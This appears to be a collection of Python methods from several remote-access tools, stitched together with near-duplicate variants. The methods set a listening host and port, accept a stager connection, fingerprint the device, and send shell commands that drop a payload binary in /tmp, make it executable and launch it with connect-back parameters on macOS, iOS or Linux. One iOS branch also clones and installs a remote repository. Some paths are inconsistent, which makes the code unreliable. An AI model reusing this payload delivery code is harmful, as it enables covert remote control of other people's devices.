def set_host_port(self): try: lhost = h.getip() lport = None choice = raw_input(h.info_general_raw("Local Host: ")) if choice != "": lhost = choice while True: lport = raw_input(h.info_general_raw("Local Port: ")) if not lport: lport = 4444 try: lport = int(lport) except ValueError: h.info_error("Invalid port, please enter a valid integer.") continue if lport < 1024: h.info_error("Invalid port, please enter a value >= 1024.") continue break h.info_general("Using " + lhost + ":" + str(lport) + "...") self.host = socket.gethostbyname(lhost) self.port = lport return True except KeyboardInterrupt: return
def disconnect(self, verbose): self.conn.close() if verbose: h.info_general("Closing session...") time.sleep(0.5) if self.server.multihandler.is_running: del self.server.multihandler.sessions_id[self.id] del self.server.multihandler.sessions_uid[self.uid]
def craft_payload(self, device_arch): # TODO: Detect uid before we send executable if not self.host: raise ValueError('Server host not set') if not self.port: raise ValueError('Server port not set') payload_parameter = h.b64( json.dumps({ "ip": self.host, "port": self.port, "debug": self.debug })) if device_arch in self.macos_architectures: self.verbose_print("Detected macOS") f = open("resources/mplmacos", "rb") payload = f.read() f.close() #save to tmp, instructions = \ "cat >/private/tmp/tmpmpl;"+\ "chmod 777 /private/tmp/tmpmpl;"+\ "mv /private/tmp/tmpmpl /private/tmp/mpl;"+\ "/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) elif device_arch in self.ios_architectures: self.verbose_print("Detected iOS") f = open("resources/mplios", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/tmpmpl;"+\ "chmod 777 /tmp/tmpmpl;"+\ "mv /tmp/tmpmpl /.mpl;"+\ "rm -r mouse;"+\ "git clone https://github.com/entynetproject/mouse.git;"+\ "cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"+\ "/.mpl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) else: if device_arch == "Linux": self.verbose_print("Detected Linux") elif "GET / HTTP/1.1" in device_arch: raise ValueError( "MPL does not exploit safari, it is a payload loader.") else: h.info_general("Device unrecognized, trying python payload...") f = open("resources/mpl.py", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/mpl.py;"+\ "chmod 777 /var/tmp/mpl.py;"+\ "python /tmp/mpl.py "+payload_parameter+" &\n" return (instructions, payload)
def craft_payload(self, device_arch): # TODO: Detect uid before we send executable if not self.host: raise ValueError('Server host not set') if not self.port: raise ValueError('Server port not set') payload_parameter = h.b64( json.dumps({ "ip": self.host, "port": self.port, "debug": self.debug })) if device_arch in self.macos_architectures: self.verbose_print("Detected macOS") f = open("resources/esplmacos", "rb") payload = f.read() f.close() #save to tmp, instructions = \ "cat >/private/tmp/tmpespl;"+\ "chmod 777 /private/tmp/tmpespl;"+\ "mv /private/tmp/tmpespl /private/tmp/espl;"+\ "/private/tmp/espl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) elif device_arch in self.ios_architectures: self.verbose_print("Detected iOS") f = open("resources/esplios", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/tmpespl;"+\ "chmod 777 /tmp/tmpespl;"+\ "mv /tmp/tmpespl /.espl;"+\ "/.espl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) else: if device_arch == "Linux": self.verbose_print("Detected Linux") elif "GET / HTTP/1.1" in device_arch: raise ValueError( "EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file" ) else: h.info_general("Device unrecognized, trying python payload") f = open("resources/espl.py", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/espl.py;"+\ "chmod 777 /var/tmp/espl.py;"+\ "python /tmp/espl.py "+payload_parameter+" &\n" return (instructions, payload)
def set_host_port(self): try: lhost = h.getip() lport = None choice = raw_input( h.info_general_raw("SET LHOST (Leave blank for " + lhost + ")>")) if choice != "": lhost = choice h.info_general("LHOST = " + lhost) while True: lport = raw_input( h.info_general_raw("SET LPORT (Leave blank for 4444)>")) if not lport: lport = 4444 try: lport = int(lport) except ValueError: h.info_general( "invalid port, please enter a valid integer") continue if lport < 1024: h.info_general( "invalid port, please enter a value >= 1024") continue break h.info_general("LPORT = " + str(lport)) self.host = socket.gethostbyname(lhost) self.port = lport return True except KeyboardInterrupt: return
def set_host_port(self): try: lhost = h.getip() lport = None choice = raw_input( h.info_general_raw("Set Listening Host (Leave blank for " + lhost + ")>")) if choice != "": lhost = choice h.info_general("LHOST = " + lhost) while True: lport = raw_input( h.info_general_raw( "Set Listening Port (Leave blank for 1337)>")) if not lport: lport = 1337 try: lport = int(lport) except ValueError: h.info_general( "Invalid Port. Please Enter A Valid Integer Value.") continue if lport < 1024: h.info_general( "Invalid Port. Please Enter A Port With Value >= 1024") continue break h.info_general("LPORT = " + str(lport)) self.host = socket.gethostbyname(lhost) self.port = lport return True except KeyboardInterrupt: return
def craft_payload(self, device_arch): if not self.host: raise ValueError( 'Server Host IP Not Set. Please Set A Valid Host IP.') if not self.port: raise ValueError( 'Server Port Number Not Set. Please Set A Valid Port Number.') payload_parameter = h.b64( json.dumps({ "ip": self.host, "port": self.port, "debug": 1 })) if device_arch in self.macos_architectures: if self.is_multi == False: h.info_general("Detected MacOS!") f = open("resources/ruplmacos", "rb") payload = f.read() f.close() instructions = \ "cat >/private/tmp/tmprupl;"+\ "chmod 777 /private/tmp/tmprupl;"+\ "mv /private/tmp/tmprupl /private/tmp/rupl;"+\ "/private/tmp/rupl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) elif device_arch in self.ios_architectures: if self.is_multi == False: h.info_general("Detected iOS!") f = open("resources/ruplios", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/tmprupl;"+\ "chmod 777 /tmp/tmprupl;"+\ "mv /tmp/tmprupl /tmp/rupl;"+\ "/tmp/rupl "+payload_parameter+" 2>/dev/null &\n" return (instructions, payload) else: if self.is_multi == False: if device_arch == "Linux": h.info_general("Detected Linux") elif "GET / HTTP/1.1" in device_arch: raise ValueError( "RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file" ) else: h.info_general( "Device Unrecognized... \nTrying Python Payload...") f = open("resources/rupl.py", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/rupl.py;"+\ "chmod 777 /var/tmp/rupl.py;"+\ "python /tmp/rupl.py "+payload_parameter+" &\n" return (instructions, payload)
def listen_for_stager(self): identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n' s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', self.port)) s.listen(1) if self.is_multi == False: h.info_general("Listening On Port --> " + str(self.port) + ".....") try: conn, addr = s.accept() except KeyboardInterrupt: s.close() return hostAddress = addr[0] if self.is_multi == False: h.info_general("Establishing Connection To " + hostAddress) conn.send(identification_shell_command) device_arch = conn.recv(128).strip() if not device_arch: return try: bash_stager, executable = self.craft_payload(device_arch) except Exception as e: h.info_error(str(e)) raw_input("Please Press Enter To Continue Further!") return if self.is_multi == False: h.info_general("Sending Payload...") conn.send(bash_stager) conn.send(executable) conn.close() if self.is_multi == False: h.info_general("Establishing Secure Connection...") try: return self.listen_for_executable_payload(s) except ssl.SSLError as e: h.info_error("SSL error: " + str(e)) return except Exception as e: h.info_error("Error: " + str(e)) return
def verbose_print(self, text): if self.is_multi == False: h.info_general(text)